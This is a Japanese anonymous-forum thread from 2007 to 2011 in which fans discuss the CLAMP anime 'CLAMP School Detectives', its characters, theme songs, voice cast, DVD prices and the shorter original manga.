ハチポチ買ってギフト聞いてるけどいいな。
20話からってド後半だな。終盤感動的か。

173 :名無しさん@お腹いっぱい。:2007/09/21(金) 17:10:26 ID:???0
ガキだらけのアニメだと思いつつ見ていくうちにどんどん主体キャラが大人に見えてくる不思議。



174 :名無しさん@お腹いっぱい。:2007/09/21(金) 17:18:07 ID:???0
>>171
あと、にょろろ〜んと伸びて天に昇っていく凪砂さんにもねw

175 :名無しさん@お腹いっぱい。:2007/09/22(土) 09:08:38 ID:???0
もどかしいだけのジレンマばかりの日々なのさ
空飛ぶ翼も黄金の手足も何もないけれど

歌詞あってるかわからんがEDの好きな部分。↑

176 :名無しさん@お腹いっぱい。:2007/09/23(日) 18:53:41 ID:???0
>>173
会長の天才につられて皆大人になってくるのが探偵団クオリティw

177 :名無しさん@お腹いっぱい。:2007/09/24(月) 09:22:04 ID:???0
これって安い?
http://page7.auctions.yahoo.co.jp/jp/auction/g51673914

178 :名無しさん@お腹いっぱい。:2007/09/24(月) 18:16:57 ID:???0
雄大寺が最終回でバイク運転してたwww
みんな年齢忘れてるww

179 :名無しさん@お腹いっぱい。:2007/09/24(月) 18:25:05 ID:???O
アニメ少し見て面白そうだったから原作買おうかなぁとか
思ってたんだけど、やっぱDVD買った方が良いかな?

180 :178:2007/09/24(月) 18:41:19 ID:???0
最終回じゃなくてクライマックスだった。>バイク運転
最終回だと思ってさっきキッズで見てたのにw

>>179
原作はアニメとは少し違うらしい。(読んだことないけど)
聞いた話では雄大寺が出ないとか。
DVD-BOX欲しいけど高いなぁ〜。

181 :名無しさん@お腹いっぱい。:2007/09/24(月) 18:50:46 ID:???0
新品半額で買ったぜ
キョーキョッキョ

182 :名無しさん@お腹いっぱい。:2007/09/24(月) 19:13:28 ID:???0
いいなぁ〜!


183 :名無しさん@お腹いっぱい。:2007/09/24(月) 20:02:28 ID:???0
>>176
本物の大人より大人ですよね、会長ー


184 :名無しさん@お腹いっぱい。:2007/09/24(月) 20:28:35 ID:???0
会長はそうでもない

185 :名無しさん@お腹いっぱい。:2007/09/25(火) 01:49:21 ID:5X+VAHAd0
わたしも吹いた
つバイク運転w

186 :名無しさん@お腹いっぱい。:2007/09/25(火) 19:17:29 ID:???0
ギャオで雪山の回を見た
カサブランカさんお美しい〜!!

187 :名無しさん@お腹いっぱい。:2007/09/26(水) 23:10:52 ID:CJQPPWOU0
「たかむらすおう」このネーミングセンスは凄いw
多分一生忘れられない名前だw

188 :名無しさん@お腹いっぱい。:2007/09/27(木) 09:23:13 ID:???0
生徒手帳持ってる人いる?
キャスト(声優陣)写真のバックの窓にある不自然な黒い塗りつぶしのようなものって
やっぱり心霊写真等の(丁寧だけど塗りつぶすだけだから手抜き)修正だよね・・・


189 :名無しさん@お腹いっぱい。:2007/09/28(金) 18:04:31 ID:???0
多分、守護霊か声優の追っかけでも写ってたんでしょw

190 :名無しさん@お腹いっぱい。:2007/09/28(金) 22:49:10 ID:cDeEfVpj0
age

191 :名無しさん@お腹いっぱい。:2007/09/30(日) 17:20:12 ID:???0
>>118
今更ながらワロスしたw


192 :名無しさん@お腹いっぱい。:2007/10/01(月) 22:17:51 ID:???0
>>178
学園敷地内じゃ未成年が運転してもオッケー?って設定を何処かで読んだな
小説かTRPG本だったか…

>>118
ソードマスターイドムwww
…ん?三人衆と恋人たちだと1人足りなくないか?

193 :名無しさん@お腹いっぱい。:2007/10/01(月) 23:48:59 ID:???0
男なら細かい事気にしない

194 :名無しさん@お腹いっぱい。:2007/10/05(金) 12:47:16 ID:???0
いや、違う・・・
もしや!その方は女性ですか?

・・・女性ですよ。

よし!クランプ学園探偵団の名にかけて(ry

195 :名無しさん@お腹いっぱい。:2007/10/06(土) 18:40:42 ID:???O
うん教習所と一緒で敷地内なら無免許でも運転していいという理屈はある

しかし、ただ単純に小学生がうまくバイクをのりこなしてのにワロタw

しかも名前がいどむWWW

196 :名無しさん@お腹いっぱい。:2007/10/09(火) 08:04:40 ID:???0
雄大寺という苗字もすごいw


197 :名無しさん@お腹いっぱい。:2007/10/09(火) 12:12:48 ID:???0
キッズステーションで最近、放送していましたね。
のんびりほのぼのしていて(・∀・)イイ!

198 :名無しさん@お腹いっぱい。:2007/10/10(水) 12:52:17 ID:???0
clamp漫画読みなれてると、このぐらいの突飛さはさして
問題ではない

199 :名無しさん@お腹いっぱい。:2007/10/14(日) 15:42:22 ID:???0
クランプ学園の校章が新田舎ノ中(きんぎょ注意報)ぽい件について

200 :名無しさん@お腹いっぱい。:2007/10/15(月) 19:03:43 ID:???0
200!

201 :名無しさん@お腹いっぱい。:2007/10/20(土) 14:23:27 ID:???0
雄大寺はストーカー

202 :名無しさん@お腹いっぱい。:2007/10/31(水) 00:38:44 ID:???0
WONDERLAND2のブックレット…残様はあんな台詞(かけ声?)吐かないと思うw
ツバサの絵に引きずられているせいでファイかと思ったわ、一瞬。

203 :名無しさん@お腹いっぱい。:2007/11/01(木) 17:37:27 ID:???0
様?

204 :名無しさん@お腹いっぱい。:2007/11/01(木) 18:54:14 ID:???0
漫画中でほぼ様付けだからつい付けてしまう私>様

ブックレット見たい・・・

205 :名無しさん@お腹いっぱい。:2007/11/02(金) 02:05:56 ID:???0
絵が完成した頃のCLAMPが描いてくれる三人が見れただけで嬉しくてしょうがない>ブックレット
自分は男だが、これだけ魅力あるなら他の男からも評価されてもいいな。
5話ぐらいまで話が動かなくて中々されないが。

206 :名無しさん@お腹いっぱい。:2007/11/03(土) 02:29:30 ID:???0
 

207 :名無しさん@お腹いっぱい。:2007/11/05(月) 19:54:44 ID:???0
蘇芳と凪砂さんの和風の恋は良いですね

208 :名無しさん@お腹いっぱい。:2007/11/17(土) 23:34:51 ID:LoCFcbfW0
保守

209 :名無しさん@お腹いっぱい。:2007/11/25(日) 17:26:51 ID:WCR8ItsN0
保守

210 :名無しさん@お腹いっぱい。:2007/11/27(火) 05:11:14 ID:???0
CLAMP1ページでも良いからマンガ描いてくれ

211 :名無しさん@お腹いっぱい。:2007/11/27(火) 08:25:35 ID:???O
会長に恋人できれば良かったのにな

212 :名無しさん@お腹いっぱい。:2007/11/27(火) 11:13:57 ID:lAPVVjvi0
あでやかにさいた〜♪

213 :名無しさん@お腹いっぱい。:2007/12/19(水) 19:58:19 ID:Xhl00vW20
hosyu

214 :名無しさん@お腹いっぱい。:2007/12/19(水) 21:27:57 ID:???O
会長が成長したらホスト部部長になるんだと思う

215 :名無しさん@お腹いっぱい。:2007/12/21(金) 01:55:32 ID:???0
成長した会長はXでチラリズムしてたお

216 :名無しさん@お腹いっぱい。:2007/12/26(水) 01:13:49 ID:???0
またこういうの描いてくれ
萌でもウホッでも無い感じの作品

217 : 【大吉】 【236円】 :2008/01/01(火) 02:06:45 ID:???O
ホストは女主人公好きだからなあ。会長は特定の誰かは作らないんだよね。

218 :名無しさん@お腹いっぱい。:2008/01/27(日) 14:55:01 ID:haR2N/SK0
会長まで特定の誰かを作っちゃうと、フリーが居なくなるからなw

破軍星〜のコピーとCOMICBOXのCLAMP特集を読ませて貰ったよ
蘇芳と凪砂の身長設定がおかしい…120cmと90cmてw

219 :名無しさん@お腹いっぱい。:2008/02/16(土) 19:47:19 ID:Uh2GwyHn0
会長の為に保守

220 :名無しさん@お腹いっぱい。:2008/02/17(日) 09:31:31 ID:???0
CLAMP 22〜セレブが身障者漫画でボロ儲け〜
http://anime3.2ch.net/test/read.cgi/gcomic/1201002347/

221 :po:2008/02/24(日) 19:36:20 ID:???0
会長・・・・

222 :名無しさん@お腹いっぱい。:2008/02/24(日) 21:15:30 ID:???0
会長なら働いたら負けと言っていい!

223 :名無しさん:2008/02/25(月) 17:43:41 ID:???0
^^

224 :名無しさん@お腹いっぱい。:2008/03/22(土) 01:45:29 ID:???O
たかむらすおうあげ

225 :名無しさん@お腹いっぱい。:2008/03/22(土) 01:48:05 ID:6HZQoeoFO
あげ

226 :名無しさん@お腹いっぱい。:2008/03/27(木) 02:26:12 ID:???0
これ、原作どうだったの?
結局クランプが多忙のまま蔵入りしたんだっけ?

227 :名無しさん@お腹いっぱい。:2008/04/18(金) 04:44:58 ID:???0
>>226
蔵ではなく一応ちゃんと終わってるよ
ただ原作はたった3巻で終わり
キャラが魅力あるだけにもったいない・・・

228 :名無しさん@お腹いっぱい。:2008/04/24(木) 12:14:35 ID:???0
>>227
でも中途半端な終わり方だったような
えこれで終わり!?的な最終話だった

229 :名無しさん@お腹いっぱい。:2008/04/25(金) 18:40:48 ID:???0
探偵団、今のクランプだとどんな風に描くのかな。
ちょっと見てみたいかも

230 :名無しさん@お腹いっぱい。:2008/04/29(火) 01:45:24 ID:???0
新約CLAMP学園探偵団だねっ
劇場版でw

231 :名無しさん@お腹いっぱい。:2008/04/29(火) 17:40:22 ID:???0
>>229,230

確かに。高校生編くらいを一話でいいから描いてほしいなー
劇場版もありだねw

232 :名無しさん@お腹いっぱい。:2008/05/04(日) 04:17:05 ID:???0
成長した3人の姿はXで見られるがな

233 :名無しさん@お腹いっぱい。:2008/05/04(日) 19:42:48 ID:???0
もっと見たいのさ

234 :名無しさん@お腹いっぱい。:2008/05/14(水) 17:56:00 ID:YmqSdPjW0
石田彰ボイスの悪役は感情移入できなくて、ひたすらキモいだけだったな。

235 :名無しさん@お腹いっぱい。:2008/05/14(水) 20:52:59 ID:???0
巨大な敵を出したのはいいが、どうやって非の打ち所の無い探偵団に因縁付けるか
迷った結果だろう。

236 :名無しさん@お腹いっぱい。:2008/05/17(土) 17:58:31 ID:???0
ひでえ逆恨み

237 :名無しさん@お腹いっぱい。:2008/05/21(水) 18:02:45 ID:???0
逆恨みくらいしか動機に持ってこれなかったんだろう
理解したれ

238 :名無しさん@お腹いっぱい。:2008/06/01(日) 21:08:55 ID:???0
続編が発売されたら絶対買うのに・・・・・・

239 :名無しさん@お腹いっぱい。:2008/06/10(火) 21:13:09 ID:???0
ホスト部でああいうの受けてるからCLAMPが本気出せばイケル

240 :名無しさん@お腹いっぱい。:2008/06/10(火) 23:34:33 ID:???0
性格的には残が環か?w
でも運動オンチだから守られる側なんだよなぁ
どっちかというと姫ポジション

241 :名無しさん@お腹いっぱい。:2008/06/11(水) 19:09:31 ID:???0
続編出すとしたら残の幸せを描いてほしい…

242 :名無しさん@お腹いっぱい。:2008/06/13(金) 22:08:09 ID:???0
あれより更に幸せにする気かw

243 :名無しさん@お腹いっぱい。:2008/06/14(土) 18:31:15 ID:???0
あれ幸せかなあ?

244 :名無しさん@お腹いっぱい。:2008/06/15(日) 01:28:07 ID:???0
ホスト部は女主人公がいる=逆ハーだから受けたんじゃないか?
あと、残は女が絡むと運動オンチじゃなくなるんだぜ。
アヌメで白馬に乗ってたな。
>243結局一人ぼっちだしね。

245 :名無しさん@お腹いっぱい。:2008/06/15(日) 03:51:10 ID:???0
一人ぼっち さみしい・゚・(ノД`;)・゚・

246 :名無しさん@お腹いっぱい。:2008/06/27(金) 18:06:57 ID:???0
蘇芳がいるじゃないか

247 :名無しさん@お腹いっぱい。:2008/07/04(金) 08:25:28 ID:???O
Xと同世界だとお先真っ暗で悲しいからパラレルであってほしい

248 :名無しさん@お腹いっぱい。:2008/07/04(金) 15:12:21 ID:???0
同意
作者は一応パラレルだと言ってたけどな

249 :名無しさん@お腹いっぱい。:2008/07/16(水) 22:04:27 ID:???0
残って運動オンチのわりに挑編になってからすげー走ってるよな
大丈夫なのか?

250 :名無しさん@お腹いっぱい。:2008/07/18(金) 14:58:30 ID:???0



CLAMPは人真似をする。(パクリ?)
http://changi.2ch.net/test/read.cgi/csaloon/1210189723/

.

251 :名無しさん@お腹いっぱい。:2008/07/26(土) 21:02:25 ID:???0
>>249
…ほんとだね。
まあ、深く考えちゃいけないんだろう

252 :名無しさん@お腹いっぱい。:2008/07/30(水) 15:15:49 ID:???0
いものやまのこる
たかむらすおう
いじゅういんあきら
ゆうだいじいどむ

あきら以外はおよそ実在しないような名前ばっかりw

253 :名無しさん@お腹いっぱい。:2008/08/18(月) 09:37:26 ID:???0
CLAMP学園の平和を守る為〜
三重県の生徒会から1・2・3〜

254 :名無しさん@お腹いっぱい。:2008/08/20(水) 20:54:41 ID:o3Ntk9Ju0
すげーID発見

名前:心得をよく読みましょう :2008/08/20(水) 19:55:46 ID:MHbCLIMP
なんか


255 :名無しさん@お腹いっぱい。:2008/08/26(火) 21:05:13 ID:4CJZRukPO
復活希望あげ

256 :名無しさん@お腹いっぱい。:2008/09/28(日) 21:24:21 ID:???O
あげ

257 :名無しさん@お腹いっぱい。:2008/10/12(日) 21:59:15 ID:jwRsrryqO
あげとく

258 :名無しさん@お腹いっぱい。:2008/11/08(土) 23:53:18 ID:lFxl/jxsO
あげ

259 :名無しさん@お腹いっぱい。:2008/12/28(日) 22:55:30 ID:???0


【他人の労力で】 CLAMPアンチスレ4 【自己讃美】
http://changi.2ch.net/test/read.cgi/iga/1221278965/
.

260 :名無しさん@お腹いっぱい。:2009/01/26(月) 03:55:05 ID:???O
>>244
でも孤独な主役って何かいい。
頭脳明晰、みんなの王子様でリーダー、性格もいいのに気が付いてみると一人ぼっちな残様…。
何か分からんけど何かいい…!!

261 :名無しさん@お腹いっぱい。:2009/01/31(土) 15:47:20 ID:0klajw6ZO
Xの何巻とツバサの何巻に出てきますか?

262 :名無しさん@お腹いっぱい。:2009/02/05(木) 05:02:59 ID:???0
ツバサは4巻と11巻と12巻
Xは見てない

263 :名無しさん@お腹いっぱい。:2009/02/20(金) 18:30:35 ID:???0
Xは多分10巻だったと思うよ。
あと二十面相の2巻にもほんの少しだけ出てくるね。
>>260
フレンドリーなのに孤高なのが(・∀・)イイ!!

264 :名無しさん@お腹いっぱい。:2009/04/03(金) 14:52:15 ID:bsxDy4hoO
まこの声優って誰だっけ?うたこは池澤さん?みやむー?

265 :名無しさん@お腹いっぱい。:2009/04/08(水) 03:10:35 ID:???O
矢島晶子じゃなかったっけ?
詠心がみやむー。凪砂が池澤さん

266 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:30:18 ID:???O
>265さん
 おお…、そうだったんですね。矢島さんかあ。ありがとうございました。

267 :名無しさん@お腹いっぱい。:2009/05/01(金) 21:50:01 ID:???0
ツンデレみどりこさんの話は泣けた
お金を使わなくてもささやかな幸せを感じることは可能なんだね

268 :名無しさん@お腹いっぱい。:2009/05/02(土) 20:04:06 ID:???0
もえっこ保守

269 :名無しさん@お腹いっぱい。:2009/05/04(月) 01:39:37 ID:???O
>>267
妹之山さん→残様にいつの間にかシフトしてるのも萌えるよね
原作のバレンタインverも好きだな

270 :名無しさん@お腹いっぱい。:2009/07/28(火) 20:59:27 ID:VRn+ECrB0
ほしゅ

271 :名無しさん@お腹いっぱい。:2009/11/19(木) 17:11:30 ID:???0
天外魔境Uを思い出すなぁ

272 :名無しさん@お腹いっぱい。:2009/11/21(土) 14:29:50 ID:???0
CLAMP学園探偵団くらいの他作品とのリンクは良かったのになあ
美幸ちゃんとかデュカリオンとか20面相とか

最近のCLAMPは…

273 :名無しさん@お腹いっぱい。:2009/12/08(火) 05:37:26 ID:o4plvAXkO


274 :名無しさん@お腹いっぱい。:2010/02/25(木) 10:09:49 ID:???0

【パクリ臭い】 CLAMPアンチスレ5 【NHK贔屓臭い】
http://changi.2ch.net/test/read.cgi/iga/1266204091/

275 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:36:02 ID:jByR/p4C0
保守

276 :名無しさん@お腹いっぱい。:2010/03/10(水) 09:16:24 ID:???0
小さい頃、朝よく見てたなーと懐かしくなったので、
古本屋で原作を買い直したついでにアニメもレンタルショップで探して来て
ここ一週間でぶっ通しで見た。

当時、会長はいつでも楽観的でフレンドリーな人ってイメージだったけど、
今見ると真面目なシーンではぐらかしたり、所々無理して明るいキャラを作ろうとしている感じがして
「周り人間を巻き込みたくないから友達を作らない」ってので妙にしんみりしてしまった。
玲と蘇芳に彼女が出来てからは、余計に会長だけ孤立しているというか影があるというか。

で、今更になって緑子さんが萌えキャラだったという事に気付いた。

277 :名無しさん@お腹いっぱい。:2010/04/02(金) 09:16:37 ID:???0
明るく無邪気というより
優しく孤独で意外と誰よりも大人だよね

278 :名無しさん@お腹いっぱい。:2010/04/13(火) 00:40:27 ID:???0
あでやかに咲いた〜
OPが良かった

279 :名無しさん@お腹いっぱい。:2010/04/14(水) 21:56:58 ID:oCKJ4kt6O
EDも良かったよね
空飛ぶ翼も黄金の手足も〜のくだりが好きだ

280 :名無しさん@お腹いっぱい。:2010/04/14(水) 22:26:01 ID:JX2P8HPT0
やおいっぽい設定なのに全然そんな話にしなかったのがまたいい。

281 :名無しさん@お腹いっぱい。:2010/06/30(水) 20:24:48 ID:IHQER0fkO
下がりすぎ

282 :名無しさん@そうだ選挙に行こう:2010/07/11(日) 01:35:49 ID:???0
異作じゃなくて主役の声優さんの遺作だろ

283 :名無しさん@お腹いっぱい。:2010/07/12(月) 22:43:22 ID:???O
主役…?

284 :名無しさん@お腹いっぱい。:2010/07/15(木) 19:33:09 ID:???0
            ,.., ,...,__
        ,...::-‐''"/     ``ー 、          r―――――――――――――――
    、_,;ー'"    /          `"'-,       | 
 `ー=,  /  /              ヽ    | クックックッ・・・
   ,/      f       \       `l、   | 誰か俺の噂をしてやがる
   l/'i / /´rヾMFヾ \  ヽ  、       .1   .| 
   ! | l l ヾ(:::::   ヽ〉ヽ)ヽ `l  ミ ー  .、 |   └y ,;―――――――――――――
    | {レヽ〈:::~``'' ´  ソ |! l }   ミ. ミ    ト   //
    レヽ,;:::''''`':;|;il~,. -‐'  ル )ノl / ミ ノr^,ヾ !   /
     ゝ l;ュ=≡{., (;;,(ニ===、-.l! li /ソ ;;)|./
      `!;ェ‐・オ ""'''< `・ーz'ー'~ |/ フ;;i |!
        |:'""`')'  ^ヽ;` ̄,. -‐'^  i|;;;;ノ/\ー-、-.,_
        !;:.. .:;i|   ;,  ~、´    ,/ |,..ノ;  \ ゝ ヽ``)、.,_
       ``ヽ(__,,,,...)  \_,,..-'   |;;;     |〉   トli ヽ 
         |::::::::J..,,_ ^ヽ,  : 1, ;!;:     /l、    ) |
         ヽ::r,―--一' . , il/:::  ::  / !    ;  /
         .//'i`ー-'´; ' ;. ',/;;;:::::  .:::::∧  }    ヽイ
      /  /  L.;_';_._,`.ノ;;;;;;:::::::...::::::::::/ ヽ l     ´{
     /   |/::::::::::/;;;;/;;|;;;;;:::::::::::::::::::::::(   〉{     〈
    /    /:::''''''''/;;;/ :::::|::::::::::::::::::::::::::ト   / 〉     |
     |   /     |;;〈   ::|::::::::::::::::::::::::::::\/  /      {

285 :名無しさん@お腹いっぱい。:2010/08/02(月) 08:41:21 ID:???0




【パクリ臭い】 CLAMPアンチスレ5 【NHK贔屓臭い】
http://yuzuru.2ch.net/test/read.cgi/iga/1266204091/




286 :名無しさん@お腹いっぱい。:2010/11/17(水) 00:02:31 ID:WsL7w1ZlO
基本的にボディラインがよろしくない

287 :名無しさん@お腹いっぱい。:2010/12/06(月) 01:40:25 ID:NS5mzU+W0
ひさびさにさっき見てきたが、あらためて赤面アニメだなw
不覚にも小学生にドキドキしてしまった…


288 :名無しさん@お腹いっぱい。:2011/07/11(月) 13:22:31.77 ID:dAUxPGiK0
こんなスレあったんだな
びっくりした

当時小〜中学生でとにかく残様が大好きだったんだけど
後に年上の美女を常にはべらせてたり
そのくせ婚約者がいたりという事を知って複雑な気分になった
今でも残様は大好きだけどね

289 :名無しさん@お腹いっぱい。:2011/07/12(火) 01:30:09.33 ID:???O
>>282
新山志保さんのことかな?

290 :名無しさん@お腹いっぱい。:2011/07/19(火) 11:37:13.12 ID:???0
>>288
婚約者?

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)